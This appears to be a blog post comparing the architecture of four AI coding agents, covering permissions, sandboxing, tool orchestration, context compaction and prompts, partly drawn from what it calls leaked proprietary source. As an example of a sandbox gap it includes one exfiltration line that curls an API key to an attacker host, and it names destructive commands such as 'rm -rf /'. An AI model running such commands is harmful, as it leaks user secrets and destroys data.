@Haseeb-Qureshi · Created March 31, 2026
AI Coding Agent Architecture Analysis: Claude Code vs Codex vs Cline vs OpenCode

I Read the Source Code of Four AI Coding Agents. The Real Product Isn't the AI.

I expected the differences between AI coding agents to be in how they call the LLM. They're not. The API call is trivial -- a streaming HTTP request with a JSON payload. Every agent does it essentially the same way.

What makes these tools different -- what makes them products -- is everything wrapped around that API call: the 40 tools that give the AI hands, the permission systems that keep it from breaking things, the compaction strategies that prevent it from forgetting what it's doing, and the prompt engineering that shapes how it thinks.

I cloned the source code for all four major AI coding agents -- Claude Code (from a leaked copy of Anthropic's proprietary source), OpenAI's Codex CLI, Cline (the popular VS Code extension), and OpenCode (an open-source Go CLI) -- and read through their internals. What I found reveals four competing philosophies about a fundamental question: how much should you trust an AI with your codebase?


The Quick Reference

Here's what we're looking at:

|  | Claude Code | Codex CLI | Cline | OpenCode |
| --- | --- | --- | --- | --- |
| Maker | Anthropic | OpenAI | Community (OSS) | Community (OSS) |
| Language | TypeScript | Rust + TypeScript | TypeScript | Go |
| Interface | CLI + SDK + IDE | CLI (Rust TUI) | VS Code extension | CLI (TUI) |
| LLM Support | Claude only | OpenAI only | 50+ providers | Anthropic + OpenAI |
| Codebase | ~500K lines | ~80K lines | ~150K lines | ~30K lines |
| License | Proprietary (leaked) | Apache 2.0 | Apache 2.0 | MIT |

| Dimension | Claude Code | Codex | Cline | OpenCode |
| --- | --- | --- | --- | --- |
| Security | Permission prompts + hooks | OS-level sandbox | UI approval + auto-approve | Channel-based approval |
| Tool concurrency | Parallel reads, serial writes | Serial (sandboxed) | Serial | Serial |
| Context mgmt | Multi-strategy compaction | Auto-compaction + truncation | Sliding window + summary | SQLite sessions + summary |
| Sub-agents | Full multi-agent with teams | Full multi-agent + guardian | Sub-agent system | Task sub-agents |
| File editing | Search-and-replace | Unified diff patch | Full rewrite or diff | Line-range edit |
| Session persistence | JSON transcript files | JSONL with session resume | VS Code workspace state | SQLite database |
| UI framework | React/Ink | ratatui (Rust) | VS Code Webview | Bubbletea |

The numbers don't tell the whole story. Let me walk through what actually matters.


The Trust Spectrum

The most revealing difference between these four tools isn't a feature. It's a philosophy: how much should the AI be allowed to do before a human steps in?

Each tool sits at a different point on that spectrum:

  1. Watch every move and approve each action (OpenCode, Cline in default mode)
  2. Set rules up front -- "you can run git commands freely, but ask before touching anything outside /src" (Claude Code's permission system)
  3. Enforce isolation at the OS level -- constrain all commands to a sandboxed process the kernel controls (Codex)
  4. Grant full access and hope for the best (any tool in "YOLO mode")

That position shapes every architectural decision.

Codex: Trust Nothing

Codex is the only tool among the four that provides real process-level isolation. When the AI runs a shell command, that command executes inside an OS-level sandbox:

  • macOS: Seatbelt sandbox profiles restrict filesystem access
  • Linux: Landlock LSM + bubblewrap containers isolate the process
  • Windows: Restricted process tokens limit capabilities

The sandbox enforces three tiers: read-only (can look but not touch), workspace-write (can modify files within the project directory only), and danger-full-access (no restrictions, requires explicit opt-in). Network access is controlled separately -- in the default mode, commands cannot make network requests at all.

If the AI decides to run rm -rf /, the operating system itself blocks the command. Not a permission prompt. Not a warning dialog.

The kernel says no.

Sandboxing isn't a complete answer, though. It prevents filesystem violations, but an approved network call could still exfiltrate data -- curl https://attacker.com?token=$API_KEY goes right through if network access is permitted. Security is defense in depth, not a single mechanism.

The tradeoff is friction. Sandboxed commands are slower. Some legitimate operations (installing packages, accessing APIs) require elevated permissions. The sandbox policy gets injected directly into the system prompt so the model knows its constraints before trying:

Filesystem sandboxing: sandbox_mode is `workspace-write`:
The sandbox permits reading files, and editing files in
`cwd` and `writable_roots`. Editing files in other
directories requires approval.

It tells the AI what it can't do before it tries, so it doesn't waste turns attempting something the sandbox would block anyway.

Claude Code: Trust the Permission System

Claude Code has no process-level sandbox. Instead, it relies on a multi-layered permission system -- like a bouncer checking IDs rather than a locked door:

  1. Permission mode -- default (ask before writes), plan (show full plan first), bypassPermissions (approve everything)
  2. Hook evaluation -- user-configured shell commands that run before each tool call
  3. Rule matching -- wildcard patterns like Bash(git *), FileEdit(/src/*)
  4. User prompt -- if no rule matches, ask the user

The Bash tool alone has an entire security subsystem: bashSecurity.ts validates commands for injection patterns, sedValidation.ts prevents sed from being used to bypass the file editing permission model, and destructiveCommandWarning.ts flags dangerous operations like rm -rf or git push --force.

The philosophy is: the AI should be powerful but supervised. A sophisticated permission system lets expert users grant broad access while keeping guardrails for everyone else. The risk is that permission prompts are only as good as the human reading them -- and a sufficiently crafted prompt injection (say, a malicious comment in a file the AI reads) could trick the model into requesting actions that look benign but aren't. Unlike Codex's kernel-enforced sandbox, Claude Code's safety depends on human judgment at every gate.

Cline: Trust the User's Eyes

Cline runs inside VS Code, which shapes its entire security model. Before the AI edits a file, you see a diff preview. Before it runs a command, you see the command. You click approve or deny. It's the most transparent model -- you always know exactly what's about to happen.

There's a granular auto-approval system where you can approve categories of actions (read files: yes, execute bash: no, write files: ask me). And there's a "YOLO mode" toggle that approves everything. The name is honest about the risk, but it reduces security to a single checkbox -- users who enable it may underestimate the actual danger of full autonomy.

Cline also has a CommandPermissionController that flags dangerous shell operators like >, |, and &&. But fundamentally, the security model is: trust the human to review what the AI wants to do.

OpenCode: Trust the Channel

OpenCode uses Go channels to create a clean blocking-approval pattern. When the agent needs permission, it creates a channel, publishes the request to the TUI, and blocks until the user responds. Persistent session-level approvals mean you don't get asked the same question twice.

It's the simplest model: ask, wait, proceed. No sandbox, no rule engine, no hooks. Just a channel and a human.
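
OpenCode's implementation is Go, but the pattern itself is language-agnostic. A minimal TypeScript analog of the same blocking-approval idea, with hypothetical names, might look like this:

// Illustrative TypeScript analog of OpenCode's Go-channel approval flow.
// All names here (PermissionRequest, publishToTui) are hypothetical.
type PermissionRequest = {
  action: string      // e.g. "run: npm test"
  sessionKey: string  // identifies the question for session-level persistence
}

const sessionApprovals = new Set<string>()

async function requestPermission(
  req: PermissionRequest,
  publishToTui: (req: PermissionRequest, respond: (ok: boolean) => void) => void,
): Promise<boolean> {
  // Session-level persistence: never ask the same question twice.
  if (sessionApprovals.has(req.sessionKey)) return true

  // "Create a channel, publish, block": here the channel is a promise the
  // agent awaits until the user answers in the TUI.
  const approved = await new Promise<boolean>(resolve => publishToTui(req, resolve))

  if (approved) sessionApprovals.add(req.sessionKey)
  return approved
}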


The Hands: How They Give the AI Tools

The AI is only as capable as the tools it can use. The differences are in how many tools each system provides and how it coordinates them.

Orchestration: who runs what, and when

Claude Code: 40+ Tools with Parallel Orchestration

Claude Code has the largest tool inventory: file read, file write, file edit, glob search, grep search, bash execution, web fetch, web search, notebook editing, MCP integration, LSP queries, sub-agent spawning, team creation, skill loading, and more.

The orchestration layer is particularly clever. It partitions tool calls into batches based on their nature:

  • Read-only tools (file reads, searches) run concurrently, up to 10 in parallel
  • Write tools (file edits, bash commands) run serially

So when the AI wants to read 10 files and then edit one, the 10 reads happen simultaneously, then the edit runs alone. For a typical coding task that involves reading many files before making a change, this parallel execution saves real time.

One optimization I haven't seen elsewhere: a StreamingToolExecutor starts executing tools while the model is still generating its response. If the model emits a complete tool call before it's done talking, execution begins immediately rather than waiting for the full response to finish. On a multi-tool response, this can shave seconds off wall-clock time -- the file reads are already done by the time the model finishes explaining what it's about to do.

Codex: 25+ Tools, Security First

Other write-ups often claim Codex has only a handful of tools. That's wrong. The Rust core defines 25+ tool handlers including shell execution, code patching (in both JSON and freeform formats), directory listing, JavaScript REPL, multi-agent orchestration (spawn, resume, wait, close, send-message, list, assign-task), image viewing, MCP integration, and even batch agent jobs via spawn_agents_on_csv.

Codex's apply_patch tool deserves special attention. Instead of Claude Code's search-and-replace or Cline's full-file rewrites, Codex uses unified diff format. The model generates a patch, and the tool applies it.

This isn't just about token efficiency (though it is more efficient). Unified diff is a semantic design choice. It forces the model to reason about context lines, creating an implicit incentive for surgical edits rather than wholesale rewrites. It also makes the output portable -- AI-generated patches can be reviewed with standard diff/patch utilities, piped into code review tools, or applied by hand. Search-and-replace can silently match in the wrong location if a pattern appears multiple times; diffs are anchored to specific positions in specific files.
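
For illustration, here is what a standard unified diff hunk looks like -- anchored to a specific file and line range, with context lines around the change. (The exact envelope apply_patch expects may differ; this is plain unified diff, shown only to make the format concrete.)

--- a/src/user.ts
+++ b/src/user.ts
@@ -10,5 +10,5 @@
 export function getUser(id: string) {
   const user = db.find(id)
-  if (!user) return null
+  if (!user) throw new Error(`no user ${id}`)
   return user
 }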

Every tool goes through the sandbox system. The sandbox requirements are declared per-tool, so the system knows which permissions each tool needs before it executes.

Cline: Adaptive Tool Definitions

Cline's most interesting tool trick is dual-mode definitions. Each tool has variants for different model families:

For older models that don't support function calling, tools are rendered as XML in the system prompt:

<write_to_file>
  <path>src/app.ts</path>
  <content>file contents here</content>
</write_to_file>

For newer Anthropic and OpenAI models, the same tools use native function calling APIs. This lets Cline support models that range from GPT-5 down to local Ollama models that can only parse XML.
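
As a rough sketch of the other mode, the same write_to_file tool expressed as a native tool definition looks something like this (the JSON Schema shape is the common one used by function-calling APIs; Cline's actual wrapper types aren't shown):

// Illustrative native tool definition for the same write_to_file tool.
// Field names follow the Anthropic-style tool schema; OpenAI's differs slightly.
const writeToFileTool = {
  name: "write_to_file",
  description: "Write content to a file at the given path, creating it if necessary.",
  input_schema: {
    type: "object",
    properties: {
      path: { type: "string", description: "Relative path of the file to write" },
      content: { type: "string", description: "Complete contents to write" },
    },
    required: ["path", "content"],
  },
}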

Cline also has browser automation via Puppeteer -- a capability that lets the AI navigate web pages, click buttons, fill forms, and take screenshots. If you're building a web app and want the AI to actually test it in a browser, Cline is the only tool that does this natively.

OpenCode: LSP-Aware Tools

OpenCode has a smaller set (Bash, Edit, Fetch, Glob, Grep, LS, View, Patch, Write, Diagnostic, Agent) but with one standout: the Diagnostic tool. It queries running LSP (Language Server Protocol) servers for code diagnostics -- compiler errors, type mismatches, unused imports.

Both Claude Code and OpenCode have LSP integration, but OpenCode makes it a first-class tool the agent can invoke directly. The agent doesn't need to run a build command and parse the output to find errors; it can ask the language server directly. This gives it IDE-level understanding of the codebase.


The Memory Problem

LLMs forget. They have fixed context windows -- typically 128K to 200K tokens -- and a long coding session can easily overflow that. When it happens, the AI starts losing track of earlier decisions, file contents it read, and the overall plan. Each tool handles this differently.

Claude Code: Four Fallback Strategies

Claude Code throws everything at the problem:

  1. Proactive compaction -- monitors token count and summarizes older messages before hitting the limit
  2. Reactive compaction -- catches prompt_too_long errors from the API and compacts retroactively
  3. Snip compaction -- in SDK/headless mode, truncates at defined boundaries to bound memory in long sessions
  4. Context collapse -- a feature-flagged system that compresses verbose tool results mid-conversation without full compaction

The compaction produces a "compact boundary" marker. Everything before the boundary is replaced with a summary. The system is careful about persistence -- transcript files handle boundary relinks so --resume works correctly after compaction, even if the process was killed mid-turn.

There's also an LRU file state cache (100 files, 25MB) that tracks file contents across turns, preventing redundant re-reads.

Codex: Rust-Powered Compaction

Codex's context management is more capable than it looks from the outside. The Rust core includes compact.rs and compact_remote.rs with pre-turn compaction, mid-turn compaction, and remote compaction strategies. A summarization prompt template generates concise context summaries, and token-aware truncation via the output truncation utilities keeps tool results from dominating the context window.

Cline: The Self-Summary Approach

Cline takes a pragmatic approach. It calculates usable context per model (200K Claude models get a 160K buffer; 128K models get 98K). When approaching the limit, a CondenseHandler asks the LLM itself to summarize the conversation -- capturing intent, modified files, code snippets, pending tasks, and next steps. It's meta-prompting: the AI summarizes its own work so it can continue from the summary.
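
A minimal sketch of that budget logic, using the figures above (function names are illustrative, not Cline's):

// Illustrative only: per-model context budget and the condense trigger.
function usableContext(contextWindow: number): number {
  if (contextWindow >= 200_000) return 160_000  // 200K Claude models -> 160K buffer
  if (contextWindow >= 128_000) return 98_000   // 128K models -> 98K buffer
  return Math.floor(contextWindow * 0.75)       // fallback for smaller windows (assumption)
}

function shouldCondense(tokensUsed: number, contextWindow: number): boolean {
  // When usage approaches the budget, ask the LLM to summarize its own work.
  return tokensUsed >= usableContext(contextWindow)
}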

OpenCode: Sessions in SQLite

OpenCode stores everything in SQLite -- sessions, messages, token counts, costs. Sessions can have sub-sessions (for tool calls) and auto-generated titles. The SummaryMessageID field enables conversation summarization, though the compaction is simpler than the others.


Prompt Engineering as a Science

This is where having the actual source code matters most. You can't reverse-engineer a system prompt from the outside. How these tools instruct the LLM reveals their design philosophy more than any other component.

Claude Code: Data-Driven, A/B Tested, Cache-Optimized

Claude Code's system prompt is assembled from ~15 composable functions, each generating a section: identity, system rules, coding style, destructive action safety, tool usage guidance, tone, output efficiency, environment info, memory, MCP instructions.

Three patterns stand out:

The cache boundary. A marker called __SYSTEM_PROMPT_DYNAMIC_BOUNDARY__ splits the prompt into two halves. Everything above is static -- the behavioral instructions that are the same for every user -- and gets cached with scope: 'global' in the Anthropic API. Everything below is per-session (your CLAUDE.md files, your MCP servers, your environment). This means the ~3,000 tokens of behavioral rules are cached and reused across all users globally, saving on API costs at scale.

Numeric length anchors. Instead of saying "be concise," the internal prompt says:

Length limits: keep text between tool calls to <=25 words.
Keep final responses to <=100 words unless the task
requires more detail.

An internal source code comment references "~1.2% output token reduction vs qualitative 'be concise'" from A/B testing. That's internal company data, not peer-reviewed research, but it suggests Anthropic treats prompt wording like ad copy -- specific numbers outperform vague instructions, and they're measuring the difference.

Internal vs. external prompts. A process.env.USER_TYPE === 'ant' check throughout the codebase gives Anthropic's internal engineers different prompts. Internal users get: "If you notice the user's request is based on a misconception, say so" and "Never claim 'all tests pass' when output shows failures." There are also A/B test markers throughout: @[MODEL LAUNCH]: capy v8 thoroughness counterweight (PR #24302) -- un-gate once validated on external via A/B. The leaked source is a window into how Anthropic iterates on prompt engineering in production.

Codex: Sandbox-Aware Prompting

Codex's cleverest prompt idea is injecting the current sandbox policy directly into the system prompt. The model is told exactly what it can and cannot do before it tries. This reduces wasted turns where the model attempts something the sandbox would block.

Cline: Multi-Model Templating

Cline uses a PromptRegistry with model-family variants. The same conceptual instruction renders differently for Claude, GPT-5, Gemini, and generic models. This is necessary overhead when supporting 50+ providers -- each model responds differently to the same phrasing.

OpenCode: Provider-Specific Prompts

OpenCode takes a simpler approach -- different base prompts for Anthropic and OpenAI models, selected at runtime based on the configured provider. The prompts include instructions for OpenCode.md (their equivalent of CLAUDE.md) and LSP integration guidance.


Multi-Agent: AIs That Delegate to Other AIs

All four tools can now spawn sub-agents -- separate AI instances that work on sub-problems independently. The implementations vary wildly.

Claude Code: The Full Orchestra

Claude Code has the richest multi-agent system among the four:

  • AgentTool spawns sub-agents with their own QueryEngine instances and filtered tool sets
  • Agents can run foreground (blocking) or background (async, with notification on completion)
  • SendMessageTool enables inter-agent communication
  • TeamCreateTool spawns multiple agents as a coordinated team
  • Agents can get their own git worktrees -- filesystem-level isolation so they don't step on each other's changes
  • A "fork" mode where the sub-agent keeps its tool output out of the parent's context (protecting the parent from context bloat)
  • Auto-background after 120 seconds to prevent sub-agents from blocking indefinitely

The system prompt explicitly prevents infinite delegation: "If you ARE the fork -- execute directly; do not re-delegate."

Codex: Agent Orchestration + Safety Guardian

Codex has a more extensive multi-agent system than it's usually given credit for. The Rust core includes full agent lifecycle management: spawn_agent, resume_agent, wait_agent, close_agent, send_message, list_agents, and assign_task. There's even spawn_agents_on_csv for batch agent jobs.

On top of this, Codex has a guardian_subagent -- a separate AI that reviews tool calls for policy compliance. Think of it as a security reviewer that runs alongside the main agent, catching dangerous actions before they execute. When the guardian is uncertain, it escalates to the user.

Cline: Sub-Agent Support

Cline has a sub-agent system built around SubagentRunner, SubagentBuilder, and SubagentToolHandler, with configurable agent definitions loaded via AgentConfigLoader. Sub-agents can be defined and spawned for specific tasks.

OpenCode: Task Agents

OpenCode supports task sub-agents that get their own tool sets and sessions stored as child records in SQLite. Simpler than Claude Code's or Codex's systems, but functional.


The Lock-In Question

Nobody talks about this enough: Claude Code only works with Claude. Codex only works with OpenAI models.

If you build your workflow around Claude Code, you're locked into Anthropic's pricing and availability. Same for Codex with OpenAI. If either company raises prices, degrades quality, or suffers an outage, you have no fallback.

Cline is the escape hatch. Its 50+ provider support means you can switch models -- or use local models via Ollama -- without changing your workflow. The tradeoff is that multi-provider support adds complexity and the experience is inevitably less polished than a tool optimized for a single provider.

OpenCode splits the difference: it supports both Anthropic and OpenAI, giving you a choice between the two largest providers without the sprawl of 50+ integrations.

For team adoption, this matters more than any technical comparison. The best architecture is irrelevant if the company changes its pricing model.


Where this is going

The tool system is the product. Claude Code has 500K lines of code; the actual API call is maybe 200 of them. Everything else is the harness -- and the harness is where the differentiation happens.

Security reflects different threat models, not a linear scale. Codex provides OS-enforced isolation. Claude Code provides user-configurable permission rules. Cline prioritizes human oversight. None is universally "more secure" -- each optimizes for different use cases and different levels of user expertise. But as these tools gain autonomy, all of them will need to get better here. Permission prompts don't scale to agents that run overnight.

Multi-agent is where the hard engineering problems are. All four tools now support sub-agents in some form. The challenges -- shared state, merge conflicts, context isolation, preventing infinite delegation -- are the same challenges distributed systems have always faced. The team that solves multi-agent coordination cleanly wins.

Context management separates toys from tools. The difference between an agent that works for a 10-minute task and one that works for a 10-hour session is entirely about how it handles forgetting. Claude Code's four-layer compaction, Codex's Rust-powered truncation, Cline's self-summarization -- they're all fighting the same enemy.

The survivors will combine Codex's security model, Claude Code's orchestration, Cline's flexibility, and OpenCode's LSP integration. Whether that convergence happens through competition or open-source collaboration is the interesting question.


Which One Should You Use?

For maximum capability today: Claude Code. Deepest tool system, best context management, most powerful multi-agent orchestration. The tradeoff is vendor lock-in to Anthropic and a complexity level that's hard to debug when things go wrong.

For security-sensitive environments: Codex. OS-level sandboxing is a fundamentally different safety guarantee than permission prompts. If you're working on a codebase where a runaway command could cause real damage, Codex is the only tool that provides genuine containment. Its multi-agent and compaction capabilities are better than people think.

For maximum flexibility: Cline. If you want to use whatever model is best right now -- or switch tomorrow without changing your workflow -- Cline is the only option. Browser automation and sub-agents are bonuses. The tradeoff is it only runs inside VS Code.

For understanding and customization: OpenCode. At 30K lines of clean Go, you can read the entire codebase in a day. If you want to fork a coding agent and build on it, start here. LSP integration and SQLite sessions are well-engineered foundations.

Right now, your choice of model often forces your choice of harness -- Claude Code for Claude, Codex for GPT. That coupling will weaken as models commoditize and the harness features (multi-agent, security, context management) become the real differentiators. The shift is already visible: Cline's 50+ provider support exists precisely because some users value harness flexibility over model lock-in.

Inside Claude Code: How Anthropic Built a Production Agentic Harness

A leaked copy of Anthropic's Claude Code CLI source code surfaced on GitHub recently. At roughly 1,900 files and 500,000+ lines of TypeScript, it's one of the most complete pictures we've ever gotten of what a production-grade agentic coding harness actually looks like under the hood.

I downloaded it, read through the key modules, and what follows is a detailed breakdown of how the system works -- including the clever engineering patterns that aren't obvious from the outside.


The Core Loop: QueryEngine and query()

Everything starts with QueryEngine (src/QueryEngine.ts), a class that owns a single conversation's lifecycle. It exposes one key method:

async *submitMessage(
  prompt: string | ContentBlockParam[],
): AsyncGenerator<SDKMessage, void, unknown>

This is an async generator. The caller (CLI REPL, SDK, IDE bridge) sends a message and iterates over the yielded events -- assistant text, tool calls, progress updates, errors, compaction boundaries, and eventually a terminal result message.

Inside submitMessage, the flow is:

  1. Assemble system prompt -- from composable sections (more on this below)
  2. Process user input -- handle slash commands, attachments, queued commands
  3. Snapshot file state -- for undo support
  4. Enter the query loop -- call query() which is the real engine

The query() function in src/query.ts is a while(true) loop:

while (true) {
  stream response from Anthropic API
  if stop_reason === "end_turn" → break
  if tool_use blocks → execute tools → feed results back → continue
  if max_turns or budget exceeded → break with error
  if context too large → compact → continue
}

Every iteration sends the full message history to the API, gets back a streamed response, and checks whether to continue. The loop only terminates on end_turn, budget exhaustion, max turns, or abort signal.
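
Fleshed out slightly, as a simplified TypeScript sketch of the loop's shape with the real machinery injected as dependencies (illustrative, not the actual source):

// Simplified sketch of the agentic loop. Everything here is illustrative.
type Turn = { stopReason: "end_turn" | "tool_use"; toolUses: unknown[]; messages: unknown[] }

async function runQueryLoop(
  deps: {
    streamTurn: (history: unknown[]) => Promise<Turn>      // streamed API call
    runTools: (toolUses: unknown[]) => Promise<unknown[]>   // permission-gated execution
    estimateTokens: (history: unknown[]) => number
    compact: (history: unknown[]) => Promise<unknown[]>     // summarize older messages
    maxTurns: number
    contextLimit: number
  },
  history: unknown[],
): Promise<void> {
  for (let turn = 0; ; turn++) {
    if (turn >= deps.maxTurns) throw new Error("max turns exceeded")

    const result = await deps.streamTurn(history)   // full history sent every iteration
    history.push(...result.messages)

    if (result.stopReason === "end_turn") return    // the only normal exit

    history.push(...(await deps.runTools(result.toolUses)))  // feed tool results back

    if (deps.estimateTokens(history) > deps.contextLimit) {
      history = await deps.compact(history)         // compact, then continue the loop
    }
  }
}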

The "Thinking Rules" Comment

There's a delightful comment in query.ts that encapsulates the pain of working with the API:

The rules of thinking are lengthy and fortuitous. They require plenty
of thinking of most long duration and deep meditation for a wizard to
wrap one's noggin around.

The rules follow:
1. A message that contains a thinking block must be part of a query
   whose max_thinking_length > 0
2. A thinking block may not be the last message in a block
3. Thinking blocks must be preserved for the duration of an assistant
   trajectory

Heed these rules well, young wizard. For they are the rules of
thinking, and the rules of thinking are the rules of the universe.
If ye does not heed these rules, ye will be punished with an entire
day of debugging and hair pulling.

This is not documentation for the reader -- it's a scar from production debugging.


The Tool System: 40+ Tools, Orchestrated

Tools live in src/tools/, each built with a buildTool() factory:

buildTool({
  name: "Edit",
  inputSchema: z.object({ file_path: z.string(), ... }),
  call: async (input, context) => { ... },
  checkPermissions: async (input, context) => { ... },
  isConcurrencySafe: () => true,
  isReadOnly: () => false,
  prompt: () => "Performs exact string replacements...",
})

The key insight is the orchestration model in src/services/tools/toolOrchestration.ts:

  • Read-only tools (Glob, Grep, Read) run concurrently, up to 10 in parallel
  • Write tools (Edit, Write, Bash) run serially
  • Each tool declares isConcurrencySafe() -- the harness respects this at runtime

This means when Claude wants to read 5 files simultaneously, it can. But when it wants to edit a file and then run tests, those are serialized.
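
A simplified sketch of that partitioning (the real orchestrator also handles streaming, progress events, and aborts):

// Illustrative: group consecutive concurrency-safe calls into parallel batches,
// run everything else one at a time. Names and shapes are simplified.
type ToolCall = { name: string; input: unknown }
type Tool = { isConcurrencySafe: () => boolean; call: (input: unknown) => Promise<string> }

async function executeToolCalls(
  calls: ToolCall[],
  tools: Map<string, Tool>,
  maxParallel = 10,
): Promise<string[]> {
  const results: string[] = []
  let i = 0
  while (i < calls.length) {
    if (tools.get(calls[i].name)!.isConcurrencySafe()) {
      // Read-only tools (Glob, Grep, Read): batch and run concurrently, capped at 10.
      const batch: ToolCall[] = []
      while (
        i < calls.length &&
        tools.get(calls[i].name)!.isConcurrencySafe() &&
        batch.length < maxParallel
      ) {
        batch.push(calls[i++])
      }
      results.push(...(await Promise.all(batch.map(c => tools.get(c.name)!.call(c.input)))))
    } else {
      // Write tools (Edit, Write, Bash): strictly serial.
      results.push(await tools.get(calls[i].name)!.call(calls[i].input))
      i++
    }
  }
  return results
}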

Streaming Tool Execution

There's a StreamingToolExecutor that begins executing tool calls while the model is still streaming. If the model emits a complete tool_use block before the full response finishes, execution starts immediately. This saves significant latency on multi-tool responses.

BashTool: The Most Complex Tool

The Bash tool has its own security subsystem:

  • bashSecurity.ts -- validates commands for injection patterns
  • bashPermissions.ts -- checks against permission rules
  • sedValidation.ts and sedEditParser.ts -- prevents sed from being used to bypass the Edit tool's permission model
  • destructiveCommandWarning.ts -- flags rm -rf, git push --force, etc.
  • shouldUseSandbox.ts -- decides whether to run in a sandboxed environment

There's also commandSemantics.ts which classifies bash commands by their nature (read-only, write, network, etc.) for smarter permission decisions.


System Prompt Engineering: The Art of Composition

The system prompt (src/constants/prompts.ts) is not a single string. It's assembled from ~15 composable sections, each generated by a function:

getSimpleIntroSection()      -- identity and role
getSimpleSystemSection()     -- tool permission mode, system-reminder tags
getSimpleDoingTasksSection() -- coding style rules
getActionsSection()          -- destructive action safety
getUsingYourToolsSection()   -- tool usage guidance
getSimpleToneAndStyleSection() -- communication style
getOutputEfficiencySection() -- brevity rules
[DYNAMIC_BOUNDARY]           -- cache split marker
getSessionSpecificGuidanceSection() -- session-variant rules
loadMemoryPrompt()           -- CLAUDE.md files
computeSimpleEnvInfo()       -- OS, shell, git, model info
getMcpInstructionsSection()  -- MCP server instructions

The Cache Boundary Trick

The cleverest piece is SYSTEM_PROMPT_DYNAMIC_BOUNDARY:

export const SYSTEM_PROMPT_DYNAMIC_BOUNDARY =
  '__SYSTEM_PROMPT_DYNAMIC_BOUNDARY__'

Everything above this marker is static and gets cached with scope: 'global' in the Anthropic API's prompt caching. Everything below is session-specific (user's CLAUDE.md, MCP servers, environment info) and cannot be cached across users.

This means the ~3,000 tokens of behavioral instructions are cached and reused across all users, while per-session context is injected after the boundary. The source has comments about "Blake2b prefix hash variants" -- they're hashing the cacheable prefix to maximize cache hits.
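
Conceptually the split looks like this (a sketch; the field names below follow Anthropic's public prompt-caching API, whereas the leaked source uses its own internal caching options):

// Sketch: split the assembled prompt at the boundary and mark the static
// prefix as cacheable. Illustrative, not the actual source.
const SYSTEM_PROMPT_DYNAMIC_BOUNDARY = '__SYSTEM_PROMPT_DYNAMIC_BOUNDARY__'

function buildSystemBlocks(fullPrompt: string) {
  const [staticPart, dynamicPart] = fullPrompt.split(SYSTEM_PROMPT_DYNAMIC_BOUNDARY)
  return [
    // Identical for every user: cache once, reuse on every request.
    { type: 'text', text: staticPart, cache_control: { type: 'ephemeral' } },
    // Per-session: CLAUDE.md content, MCP servers, environment info.
    { type: 'text', text: dynamicPart ?? '' },
  ]
}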

Internal vs External Prompts

There's a process.env.USER_TYPE === 'ant' check throughout the prompts. Internal Anthropic users get different instructions:

  • More assertive: "If you notice the user's request is based on a misconception, or spot a bug adjacent to what they asked about, say so."
  • Anti-false-claims: "Never claim 'all tests pass' when output shows failures, never suppress or simplify failing checks to manufacture a green result."
  • Numeric length anchors: "Keep text between tool calls to <=25 words." (Research showed ~1.2% output token reduction vs qualitative "be concise")
  • Verification agents: Spawns an adversarial verification agent after non-trivial changes

External users get simpler, terser instructions.

"Undercover" Mode

There's an isUndercover() utility. When active, it strips ALL model names and IDs from the system prompt so internal model identifiers can't leak into public commits or PRs. The comments explicitly warn about dead code elimination:

// DCE: `process.env.USER_TYPE === 'ant'` is build-time --define.
// It MUST be inlined at each callsite (not hoisted to a const)
// so the bundler can constant-fold it to `false` in external
// builds and eliminate the branch.

Permission System: Multi-Layered Safety

Every tool call passes through a permission pipeline before execution:

  1. Permission mode check -- default, plan, bypassPermissions, auto
  2. Hook evaluation -- user-configured shell commands via PreToolUse hooks
  3. Rule matching -- wildcard patterns like Bash(git *), FileEdit(/src/*)
  4. User prompt -- if no rule matches, ask the user

The permission system tracks denials and replays them to the SDK caller. If a user denies a tool call, the denial is wrapped and fed back to Claude so it can adjust its approach.
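
In outline, the pipeline's decision order looks something like this (a sketch of the flow with illustrative names, not the real implementation):

// Illustrative permission pipeline: mode -> hooks -> rules -> user prompt.
type Decision = 'allow' | 'deny' | 'ask'

async function checkPermission(
  toolName: string,
  input: unknown,
  ctx: {
    mode: 'default' | 'plan' | 'bypassPermissions' | 'auto'
    runPreToolUseHooks: (tool: string, input: unknown) => Promise<Decision | null>
    matchRules: (tool: string, input: unknown) => Decision | null  // e.g. Bash(git *)
    askUser: (tool: string, input: unknown) => Promise<boolean>
  },
): Promise<boolean> {
  if (ctx.mode === 'bypassPermissions') return true           // 1. permission mode

  const hook = await ctx.runPreToolUseHooks(toolName, input)  // 2. user-configured hooks
  if (hook === 'deny') return false
  if (hook === 'allow') return true

  const rule = ctx.matchRules(toolName, input)                // 3. wildcard rule matching
  if (rule === 'deny') return false
  if (rule === 'allow') return true

  return ctx.askUser(toolName, input)                         // 4. fall back to asking
}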

The "Auto" Mode Experiment

There's an experimental auto mode that uses an ML classifier to decide permissions -- essentially a smaller model gatekeeping the larger model's actions. The implementation is behind a feature flag.


Sub-Agent System: Nested QueryEngines

AgentTool (src/tools/AgentTool/) is perhaps the most architecturally interesting piece. When Claude spawns a sub-agent, it:

  1. Creates a new QueryEngine instance
  2. Filters the available tool set (sub-agents get fewer tools)
  3. Optionally creates a git worktree for filesystem isolation
  4. Runs the sub-agent either foreground (blocking) or background (async)

Sub-agents communicate with the parent via SendMessageTool. There's also TeamCreateTool for spawning multiple agents as a coordinated team.

Fork Subagents

There's a newer "fork" model (forkSubagent.ts) where the sub-agent is described as running "in the background and keeps its tool output out of your context." The key system prompt instruction:

If you ARE the fork -- execute directly; do not re-delegate.

This prevents infinite delegation chains.

Agent Auto-Background

If a foreground agent runs for more than 120 seconds, the system can automatically background it. This prevents sub-agents from blocking the main conversation indefinitely.
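
A sketch of that mechanism (the 120-second figure is from the text; everything else is illustrative):

// Illustrative: race the foreground sub-agent against a timer. If the timer
// wins, detach the agent to the background and return a handle instead.
async function runWithAutoBackground<T>(
  agentRun: Promise<T>,
  detachToBackground: () => { agentId: string },
  timeoutMs = 120_000,
): Promise<T | { backgrounded: true; agentId: string }> {
  const timedOut = Symbol('timedOut')
  const timer = new Promise<typeof timedOut>(resolve =>
    setTimeout(() => resolve(timedOut), timeoutMs),
  )

  const winner = await Promise.race([agentRun, timer])
  if (winner === timedOut) {
    return { backgrounded: true, ...detachToBackground() }
  }
  return winner as T
}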


Context Management: Auto-Compaction

When the conversation approaches context limits, the system automatically compacts:

  1. Detects token count approaching the limit
  2. Summarizes older messages into a compact boundary marker
  3. Replaces the original messages with the summary
  4. Continues with the compressed context

There's also a "reactive compaction" feature (reactiveCompact.ts) that triggers when the API actually returns a prompt_too_long error -- a fallback for when the proactive compaction misses.

Snip Compaction (SDK Mode)

For headless/SDK mode, there's a different compaction strategy called "snip" that truncates old messages at defined boundaries. The comment explains:

SDK-only: the REPL keeps full history for UI scrollback and projects
